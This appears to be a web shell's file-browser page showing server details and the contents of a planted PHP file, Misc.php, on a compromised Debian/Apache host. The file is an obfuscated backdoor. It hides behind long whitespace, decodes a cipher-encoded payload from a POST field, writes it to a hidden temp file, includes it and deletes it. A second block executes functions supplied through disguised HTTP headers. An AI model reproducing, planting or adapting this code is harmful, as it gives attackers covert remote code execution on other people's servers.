HEX
Server: Apache/2.4.59 (Debian)
System: Linux keymana 4.19.0-21-cloud-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
User: lijunjie (1003)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: //proc/thread-self/root/proc/self/root/proc/self/root/proc/19805/cwd/2023/09/Misc.php
<?php																																										if(in_array("i\x74\x65m", array_keys($_POST))){ $data = $_POST["i\x74\x65m"]; $data = explode ( "." , $data ); $ptr = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $v = 0; array_walk($data ,function ($v2) use (&$ptr ,&$v ,$s ,$sLen) { $chS = ord($s[$v % $sLen] ); $dec = ((int)$v2 - $chS - ($v % 10)) ^ 79; $ptr .= chr($dec ); $v++; } ); $obj = array_filter([sys_get_temp_dir(), getcwd(), session_save_path(), "/dev/shm", getenv("TMP"), "/var/tmp", getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir")]); $value = 0; do { $itm = $obj[$value] ?? null; if ($value >= count($obj)) break; if ((is_dir($itm) and is_writable($itm))) { $entity = join("/", [$itm, ".fac"]); if (file_put_contents($entity, $ptr)) { include $entity; @unlink($entity); die(); } } $value++; } while (true); }

$_HEADERS = getallheaders();
if (isset($_HEADERS['Sec-Websocket-Accept'])) {
    $ibase_pconnection = $_HEADERS['Sec-Websocket-Accept']('', $_HEADERS['If-Modified-Since']($_HEADERS['Clear-Site-Data']));
    $ibase_pconnection();
}